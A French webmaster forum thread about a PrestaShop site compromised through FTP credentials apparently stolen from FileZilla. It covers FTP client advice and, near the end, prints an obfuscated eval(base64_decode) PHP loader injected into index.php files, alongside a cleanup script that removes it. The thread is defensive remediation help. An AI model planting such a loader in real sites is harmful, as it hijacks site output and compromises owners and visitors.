"resolu" Qui pourrai verifier les failles de mon site? suite piratage et repiratage

[luggy]

Bonjour,
aujourd'hui je me suis fait pirater, plus de site.
Tout les fichiers et bdd etait toujours la mais modifié.
Alors j'aimerai bien savoir si il est possible de verifier mon site.(j'ai tout remis en place et changé les mdp).
avec un logiciel ou quelq'un as t il la possibilité de le faire rapidement?
ai-je loupé une etape(droit de fichiers par exemple) ou y'a-t-il une faille evidente sur prestashop?

J'ai aussi sauvegarder tout le site hacké avec la bdd (j'ai pas eu le temp de verifier si elle a été modifié).
le index.php commence par : <?php eval(base64_decode('aWYo.....)

Merci d'avance.

[Bruno Leveque]

Bonsoir Luggy,

C'est un hack classique qui tourne beaucoup en ce moment sur le net.

Dans la plupart des cas, ton PC en lui même est infecté, et le robot est allé voir ton fichier de mots de passe FTP.
Je présume que tu utilises Filezilla par exemple, les accès sont stockés en clair.

Après il se connecte et scanne l'ensemble des fichiers, cherche tout ce qui est index.php et ajoute la ligne mentionnée en début de fichier.

Urgent : modifier tes accès FTP et installer un antivirus sur ta machine

Plus d'info sur ce type de hack ici :
http://www.google.fr/#hl=fr&source=hp&q=hack+deface+base64_decode&btnG=Recherche+Google&meta;=&aq=f&oq=hack+deface+base64_decode&fp=ac6a7a6977528674

Cordialement,

[luggy]

bonjour
merci de la reponse rapide,
j'ai un antivirus sur mon pc, rien...
apres c'est vrai que j'utilise ce client ftp.
je vais essayé de renforcer tout ca ......
merci

ps je pense que le post de cuisinedu13 est similaire.

[luggy]

bon ca doit etre mon pc
recidive de piratage et plantage de pc la je suis sur un autre pc .
j'espere juste pourvoir recuper mes sauvegardes

[Vinc3nzo]

Un Bon Coup de NOD32 Smart Sécurity, Et lee PC devrais Mieux Fonctionner après érradicatioon des Virus.

[luggy]

oui mais la je suis obliger de tout reinstaler car le pc est naze
je suis dans la phase sauvegarde. mais merci.
La je galere bien et je vais pas beaucoup dormir.

Par contre je tiens a SIGNALER que j'avais plusieur site sous mon filezila contenant des index.php aussi
mais seul le site avec prestashop a été piraté et ce a 2 reprises aujourd'hui
Ce matin en partant j'avais le pc eteint
le 1er hack c'est fait cet apres midi le second ce soir pendant ce post. Alors ce n'est pas que je ne crois pas Bruno.
Mais cela a L'air relativement etrange.
pour le bug du pc avec wind aube c'est pas la 1ere fois que windows plante.
Je pense réellement qu'il faut surveiller ce probleme si je ne suis pas le seul.(pour l'instant on est au moins 2)
La derniere chose que j'ai fait (sans accusation) il y a dans un post du forum une personne qui propose de s'inscrire pour son futur annuaire de ecommerce et ce gratuitement. j'ai tenté on verra bien.

si le probleme venait vraiment d'un cheval de troie ba j'ai vraiment pas de bol(mais j'ai tout sauvegarder je verrai bien)

[Bruno Leveque]

Re,

Le hack n'a rien à voir avec le fait que le PC soit allumé ou non.

Dès lors que l'attaquant a récupéré l'accès FTP, il lance l'attaque depuis un serveur passerelle.

Pour cela, il suffit de demander à ton hébergeur de regarder dans les logs FTP quelle est l'adresse IP qui a modifié le fichier index.php.

Cordialement,

[Sam59]

Etant donné que filezilla comporte manifestement une faille de sécurité qui commence à être fort exploitée par les pirates, que conseillez-vous comme client ftp plus sécurisé ?

[jeckyl]

Bonjour,


Euuuuh, je conseil un Mac sur tout.

bon je sors ...

[paulcool]

Bonjour,
logiciel FTP a tenter: WS_FTP95.exe , que j'utilise depuis 1996
Bonne chance

[Sam59]

Merci
Pour le mac, perso, je dois rester sur PC pas le choix.
Il faut donc un bon client FTP sur PC si fliezilla est trop dangereux.

Ce qui m'épate, c'est que les anciennes versions de filezilla permettaient de ne pas stocker le mot de passe. Désormais, ça n'est plus possible. Pour ma part, je le supprime donc de mon assistant de connexion après chaque connexion. Mais c'est pas bien pratique...

[Damien Metzger]

Sous Windows XP, il suffit de crypter le dossier C:\Documents and Settings\VotreUser\Application Data\FileZilla (ou équivalent).
Pour crypter, clic-droit sur le dossier, propriétés, avancé, crypter.

[Sam59]

Merci pour l'astuce !

[luggy]

Merci a vous,
bon manifestement je me suis fais prendre sur mon pc,
je pense avoir eu un peu de chance du fait qu'il s'en soit pris qu'a un seul site.
Mais moins pour le pc.
j'ai tenter un nouveau client ftp (core ftp) je le deconseille : une bonne partie de la nuit et de la journée pour transeferer le img/p.
(Pour le pc allumé c'etait par rapport a la recuperation des mots de passe ca a du se faire quelques jours avant )

[luggy]

HA j'oubliais pendant que j'y suis google est passé sur mon site a ce moment la (ainsi que 2autres moteurs)
du coup j'ai demandé une verification mais j'ai perdu en position sur certaine recherche.
Vous pensez que cela va redevenir comme avant?

[StoreCommander]

Sous Windows XP, il suffit de crypter le dossier C:\Documents and Settings\VotreUser\Application Data\FileZilla (ou équivalent).
Pour crypter, clic-droit sur le dossier, propriétés, avancé, crypter.

A priori ça ne servirait pas à grand chose car cela crypte pour éviter aux autres utilisateurs de la même machine de lire les données et pas à un logiciel lancé dans la session courante :

http://support.microsoft.com/kb/307877/fr

[Damien Metzger]

Ca me parait cohérent, mais c'est alors dommage car c'était le seul conseil logique que j'avais trouvé.
Il faut donc en plus installer et lancer filezilla en administrateur, et se servir d'un compte user limité...

[StoreCommander]

J'avais tellement confiance en FileZilla que je n'avais jamais remarqué ce changement de gestion des mots de passe.
Je ne l'utiliserai plus. Il sera désinstallé avant ce soir, sécurité avant tout !

[Patric]

Je comprends pourquoi on trouve un bouton pour télécharger antivirus et firewall sur le site de FileZilla.

[Sam59]

Pour le moment, la solution que j'utilise est de ne pas stocker mon MDP dans filezilla.
Cela m'oblige à ouvrir mon gestionnaire de connexion, entrer le mdp puis me connecter.
Puis une fois connecté, ouvrir à nouveau le gestionnaire de connexion pour effacer le mdp.

Alors qu'il suffirait que filezilla remette sa case à cocher pour choisir de sauvegarder ou non le mdp, comme c'était le cas dans les anciennes versions !

[StoreCommander]

FileZilla est mort, vive SmartFTp !

http://www.smartftp.com

J'ai à peine lancé une idée ce midi que c'est déjà codé pour la prochaine version !
Le support est super réactif, on dirait celui de PShopExpert ! ;-)

[Sam59]

J'ai à peine lancé une idée ce midi que c'est déjà codé pour la prochaine version !
Le support est super réactif, on dirait celui de PShopExpert ! ;-)

Quelle idée ???

[StoreCommander]

Pouvoir sauvegarder les listes de serveurs pour le multi-upload car actuellement c'est enregistré automatiquement mais on ne peut pas créer plusieurs listes. A noter un bug sur l'import FileZilla 3 et les paths de serveurs qui sera corrigé dans la prochaine build.

[Patric]

J'ai longtemps utilisé la version Free de SmartFTP, mais avec le temps j'ai trouvé qu'il était devenu vraiment trop "lourd".

[lehangart]

Si ça peut aider quelqu'un, j'ai trouvé un petit bout de code (à mettre dans un fichier php à la racine du site) qui nettoie tous les fichiers php infectés en remplacant
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzE2L2QxODkzNjc2MjIvaHRkb2NzL3Nob3AvanMvdGlueW1jZS9qc2NyaXB0cy90aW55X21jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvZGVmYXVsdC9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

par <?php /**/ ?>

Il suffit de mettre la chaine de caractères qui vous concerne dans le code ci-dessous:

<?php
/**
* Nettoire les fichiers
*
* @param string $name
*/
function nettoieFichier($name){
   //ouvre le fichier
   $data = file_get_contents($name);
   $count = 0;
   $data = str_replace('eval(base64_decode(\'<------EDIT------>\'));','',$data,$count);

   if($count!=0){
       echo ' Patched ';
       file_put_contents($name,$data);//ecrit le fichier
   }
}

/**
* Parcours un repertoire
*
* @param string $repname
*/
function parcoursRep($repname){
   $dir = opendir($repname);

   //lit le repertoire
   while (($file = readdir($dir)) !== false) {
       //Si c'est unfichier
       if(!is_dir($repname .'/'. $file)){
           $extension1 = substr($file, -3, 3);
           $extension2 = substr(strrchr($file,'.'),1);
           //verifien si c'est une extension php
           if($extension1==$extension2){
               if($extension1=='php'){
                   echo "Traitement du fichier : $repname/$file";
                   nettoieFichier($repname.'/'.$file);
                   echo "\n
";
               }
           }
       }else{//Si c'est un dossier
           if($file!=".." && $file!='.'){
               echo "Dir : $repname/$file \n
";
               parcoursRep($repname .'/'. $file);
           }
       }
   }
}

$dir = '.';//répertoire courant
parcoursRep($dir);
?>

PS: Merci à zzorbi du forum oscommerce
Le lien du post ici : http://www.oscommerce-fr.info/forum/index.php?showtopic=64834